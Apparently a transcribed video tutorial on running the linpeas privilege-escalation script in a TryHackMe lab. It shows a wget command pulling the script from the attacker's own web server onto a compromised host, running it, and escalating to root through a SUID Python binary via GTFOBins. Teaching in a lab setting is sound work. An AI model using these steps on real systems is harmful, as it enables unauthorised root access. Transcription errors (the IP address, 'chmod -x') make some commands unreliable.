Hello and welcome again to another video. We're going to talk about the script called linpeas today. Linpeas is a script that can help you to do Linux privilege escalation, and this is basically what it does. Now, in the process of doing privilege escalation, you might find other secrets along the way, because sometimes in order to do privilege escalation you will find username, password, hidden paths, SSH keys and whatever. You don't really know. So you find a lot of things, but the main purpose of the linpeas script is to privilege escalate. And you can read all about it here on the GitHub page and stuff. I'm going to link it down below. You can also read about it on this called Hackstrick, which is a really good place to go visit it. So basically what you can do is go ahead and download linpeas to your computer, and that's about it. Now if you go ahead and access this linpeas here, you're gonna find it, the parts, you have everything there. That's really good. There should be a installation path right here. Here we have it. So you can go ahead and then from GitHub just download it, and of course you can also just take the path and download locally to your machine if that is wish to do. Please do mind that it does upgrade sometimes, so you need to upgrade it, but that's about it. So what I have here is I already have a shell, so let's assume that we just got our initial access. We have the ID going down, who am I, whatever. And we are data, and now we want to do privilege escalation. Now the thing is, what you could do is go ahead on your machine here and say I have linpeas installed right here. So as you can see, I'm LSing it out. Then I'm going to go ahead and start Python, a web server on port 9000, download the script directly to this machine here. So I'm going to do wget http //1011.021:9000 /linpeas.sh. Now there's a chance that you get this permission denied, you cannot write to this particular location, so you can go ahead and check you're on root. So maybe you need to go to, let's say, /temp instead, and now you're on the temp. Alright, so we're going to do exactly the same thing one more time. Just copy paste the URL and download it, and this time you see that you actually got it. So now we're going to do is run a chmod -x, add executable right to it, linpeas.sh. Then basically I'm going to go ahead and run linpeas.sh just like that, and now you have it running. So ladies and gentlemen, running linpeas on a target machine is the way to go to find yourself way to privilege escalate. This is surely the way, and if you mark it, you can almost see that it talks like rrr, brr, brr, brr. So running down this, you get a report from linpeas. The most important part is the checklist here. So the legend specifies that if you get something colored like this, yellow background and red text, you got a 95% privilege escalation vector. That is a really good thing. If you see the red ones, you should probably check it out. Okay, so what you're gonna look for the very first time is you see this pseudo version here. Now by experience, you will learn stuff and basically figure out which versions not to check and to check. Now I wouldn't just go ahead and just check this the very first thing, because it would just take too much time. There are links supplied sometimes to the Hackstricks book, and I really suggest you go ahead and check it out if you have a feeling. If you've been running linpeas and you only find red clues just like that, so no 95% privilege escalation vector, then of course I would investigate if it looked likely. And this looking likely is just experience, so you need to gather some experience. But let's scroll down here and look. You got some other red mods here. Is this virtual machine? Of course it is. It's a try-hacking machine we're running, so and now we see that we have different kind of processes running as root and stuff like that. So let's just go down, further down, and if you find something, and I just want to say, you see a lot of these red ones. Now going through all of this, would take an enormous amount of time, so I'm not gonna do that. I'm just gonna, you know, scroll through just quickly the first time it's running and see what do I see. We do see we have a root user, and we do see that there's a test user as well, and a user called rootme. You see all the users and groups here. See that we have a user running right now. It's probably mine. And we have more stuff, and you see the useful software running. You see we have the curl, we got PHP, we have Perl, we have Python. So we can do different kind of things. We also have sudo. We also have some sort of compiler installed, which could be nice if we're going to do some compiling of stuff. Sometimes if you want to do some, you know, this looks like an Apache something configuration file. You can see what is the rep root and stuff like that, but we kind of know that already. And you can see you have a PHP ini right there. It could be interesting if it was writable, but it is not, as you can see. You couldn't read it. So going through all this might not give you anything. On this particular machine, I can't remember what the previous is. However, we do see this one here. As you can see, we got a pop-up on Python, which is saying that the SUID bit is set, so it is possible to execute this as root. So let's keep that in mind. And we have one more time, so also it's part of the group root, so we knew that already. Just by seeing this, I could be compelled to just try it out right away and don't waste my time. So let's go ahead and just say this is what we found with linpeas. So what you could do basically is go ahead to the GTFO bins and type in Python and find your whatever sudo privileges you need to do. Now, I'm not sure which one of these is gonna work, but we could of course just try things, you know. Could just copy paste this of course and just, you know, paste it in and see that you got not found. So you need to supply the direct path and so on. But this is not a video on privilege escalation or upgrading your shell or anything. It's just to find the actual way to do privesc, and in this particular case we need to upgrade our shell. So in order to do sudo, I could just show a few more steps just to take, for example, this and upgrade our stupid shell to a little better. So now I have this, and also so we can clear screen, just pretty standard, pretty fast. If you look at my screen, you can see what I paste, and this doesn't copy paste at all. Let me just try one more time. There you go. Paste it in. It is not allowing me to paste, so we're gonna try one more time. Copy, paste. So now I could clear screen. I could do sudo-shell now and see that we need the password for .data, and that of course would be, I don't know it. We can try and do which Python to find the exact path. So we can just paste that in there. It's not that I wanted to paste in. Copy paste this. It's still not wanting me to copy paste. But exactly this is the way you will use it. And now we're just doing the actual privesc and go ahead and take this, for example. No, all this. Then we can verify whether, you know, this would work or not by just having ID. In this particular case, we are root, so in this particular case it did actually work, which would mean that we can go to root and probably cat out the root. So yeah, so this is not a part of the room at all, but I'm just saying that this is the way you're gonna use linpeas. And I really love linpeas because it's one of the the better way to do Linux privilege escalation. Really hope you liked the video, you learned something. I'm gonna put some links down below so you can download easy. See you again online and have a really nice day.